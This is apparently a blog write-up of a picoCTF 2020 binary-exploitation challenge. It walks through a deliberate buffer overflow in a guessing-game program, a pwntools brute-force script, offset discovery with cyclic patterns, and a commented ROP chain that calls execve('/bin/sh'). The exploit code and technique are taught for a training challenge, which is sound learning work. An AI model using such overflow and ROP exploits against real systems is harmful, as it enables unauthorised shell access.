This year I decided to compete in the picoCTF 2020 Mini-Competition as my first CTF.

This is the first post in a series covering the tasks of the competition.

The task

A screenshot of the competition task. — The shown task can be found here

The code

int main(int argc, char **argv){

	int res;
	
	printf("Welcome to my guessing game!\n\n");
	
	while (1) {
		res = do_stuff();
		if (res) {
			win();
		}
	}
	
	return 0;
}

The program consists of a loop calling do_stuff(). In case do_stuff returns a truthy value, we also call win(). Examining win() we can spot a buffer overflow:

What is a buffer overflow?

For an intro to C undefined behaviour I would recommend this article; this aside parphrases it (badly).

The C standard describes what an abstract machine does when you hand it a C program. It also defines what actions of this machine are side effects that interact with its execution environment.

What the abstract machine does when running a program is more or less the “meaning” of the program.

If you’re able to tell what would happen if you run a piece of C code (what it means), you’re able to run that machine in your mind.

Computers are different kinds of machines and are not able to run C programs directly.

So a compiler is needed to map the C program onto a native program. It ensures that if we execute the native program it behaves exactly (in regards to side effects) like the C program would when run on the abstract machine.

Sadly the C standard defines a myriad of cases (undefined behaviour) where the program is actually meaningless. A compiler is allowed to do anything with such programs, it might choose not to compile them at all, giving errors. Or it might switch the program into one that calls the cops on you when it runs.

In reality, many of those programs aren’t actually meanigless but let the underlying implementation (how the abstract machine is mapped onto your real machine) shine through.

A buffer overflow (accessing an array past its bounds) is one of those cases.

#define BUFSIZE 100

void win() {
	char winner[BUFSIZE];
	printf("New winner!\nName? ");
	fgets(winner, 360, stdin);
	printf("Congrats %s\n\n", winner);
}

We get prompted to enter a name (which can be up to 360 characters including a null character). This name gets copied into a buffer that has a size of 100 characters.This results in a buffer overflow if we enter a name longer than 99 characters.

To exploit the buffer overflow, we need to win the game.

But how do we win the game?

long increment(long in) {
	return in + 1;
}

long get_random() {
	return rand() % BUFSIZE;
}

int do_stuff() {
	long ans = get_random();
	ans = increment(ans);
	int res = 0;
	
	printf("What number would you like to guess?\n");
	char guess[BUFSIZE];
	fgets(guess, BUFSIZE, stdin);
	
	long g = atol(guess);
	if (!g) {
		printf("That's not a valid number!\n");
	} else {
		if (g == ans) {
			printf("Congrats! You win! Your prize is this print statement!\n\n");
			res = 1;
		} else {
			printf("Nope!\n\n");
		}
	}
	return res;
}

Sadly there seems to be no way to cheat, we just have to luckily guess a number between 1 and 100. However, computers being fast that should not be an issue.

So before diving into exploiting the bufferoverflow we should be able to reliably win the game.

For this, we can use pwnlib:

from pwn import *
import time

LOCAL = True

local_bin = "./vuln"

if LOCAL:
    p = process(local_bin)

else:
    p = remote('jupiter.challenges.picoctf.org', 50581)

progress = log.progress('Winning the game...')
attempts = 1
start_time = time.time()

# win the game

p.sendline(b'1')
result = p.recvline_contains((b'Nope!', b'New winner'))
while result == b'Nope!':
    current_time = time.time()
    time_per_attempt = (current_time - start_time) / attempts
    needed_attempts = 300 - attempts
    eta = needed_attempts * time_per_attempt

    progress.status('{}/~300 attempts, {:0.3}s per attempt ETA~{:0.3}s'.format(attempts, time_per_attempt, eta))
    attempts += 1
    p.sendline(b'1')
    result = p.recvline_contains((b'Nope!', b'New winner'))
progress.success('We won!!')

This code is setup so we can develop our exploit locally (with debugger etc.) and then switch to remote after we are confident that it works.

All this code does is repeatedly guess 1 and send it to the process until we’ve won.

Now we can try to win the game:

And remotely so we can see our fancy progress bars and feel prouder:

Now that we can reliably reach the bufferoverflow after an amount of time we’re ready to exploit it.

The exploit

The stack stores the current return address in close proximity to the buffer we are overflowing. Our first step is to exactly find out at which buffer position that address sits. For that we could manually inspect the program in a debugger, but pwnlib supplies us a handy utility.

pwnlib.utils.cyclic.cyclic(1000, 8) generates a De Bruijn sequence.

This is a sequence that is unique for every substring of length 8.

So [0..8] != [1..9], [1..9] != [2..10] etc.. This implies if we can a random slice of the sequence [x..(x+8)] we can figure out x by just looking at the content.

We override the return address with an unknown part of the sequence, and the program tries to jump to that address.

This results in a SIGSEGV, a result of accessing invalid memory, showing us exactly what address was accessed.

This information is enough to figure out at which offset from the buffer the return address is stored, 120 in our case.

OFFSET = None
if OFFSET == None:
    log.progress('Determining OFFSET...')
    p.clean()
    payload = cyclic(1000, n=8)
    p.sendline(payload)
    p.wait()
    core = Corefile('./core')
    found_offset = cyclic_find(core.fault_addr, n=8)
    log.progress('Found OFFSET: {}, set the variable and rerun the exploit'.format(found_offset))
    exit()

At this point we are able to continue executing from an arbitrary address. Combined with our ability to write abitrary data into memory e.g. a program, this used to be enough to run shellcode.

Nowadays, we usually can not execute from memory in the stack because of Executable space protection. We are able to write a program into the buffer, but trying to execute it would result in a crash.

To execute a (nearly) arbitrary program, we need to use Return-oriented programming.

What is Return-oriented programming (ROP)?

In the days before NX Protection, we would just write our shellcode and then overwrite return address on the stack to execute it.

Because of NX Protection we’re not allowed to execute data that we’ve written but we can still return to an arbitrary address.

We’re able to jump to any code that already exists.

The chance that any random code snippet is exactly the shellcode that we need is fairly slim, but there are interesting observations to be made.

Any function has to return at one point; if it does not modify the stack it returns to the next address on it.

So we’re able to not just call any single function but string multiple function calls together by placing addresses one after the other onto the stack.

The second interesting observation is that we don’t have to call the entire function, we can call the last few instructions before the return.

Any function no matter how complicated always ends in a few fairly generic assembly instructions followed by a return.

We don’t need one function that exactly executes our shellcode, we just need many functions that execute a single or a few instructions of it before returning.

Those function epilogs are called ROP gadgets, and there are multiple tools like ROPgadget that let us search through the binary to find them.

Pwnlib exposes tools to find the necessary gadgets. The syntax for that is not documented too well, so I needed to use an external tool to find one of the gadgets.

The shellcode

Our goal is to gain shell access, the easiest way to accomplish this is to call the execve() system call with /bin/sh.

Finding a tailored data copy routine or writing one ourself within the constraints is fairly difficult. Luckily we are on a 64 bit system and our payload /bin/sh fits entirly within one reigster.

payload = (
# Fill the buffer to the point where the next 4 bytes
# override the return address
OFFSET + 
# POP the next value into RAX
p64(POP_RAX) +
# We use .bss as our scratchpad, it is readable and writable
p64(elf.bss()) +
# POP the string /bin/sh into RDX
p64(POP_RDX) +
SH_STRING +
# Move the contents of RDX (/bin/sh) into the memory
# pointed to by RAX (the beginning of the .bss seciton)
p64(MOV_PRAX_RDX) +
# Prepare for calling execv,
# load the system call number of it (59) into RAX
p64(POP_RAX) +
p64(59) +
# Load the address of the /bin/sh string into RDI
# this is the pathname argument of execve
p64(POP_RDI) +
p64(elf.bss()) +
# We do not have any arguments, load a null pointer into RSI
p64(POP_RSI) +
p64(0) +
p64(POP_RDX) +
# We do not an environemnt, load a null pointer into RDX
p64(0) +
# Do the system call
p64(SYSCALL))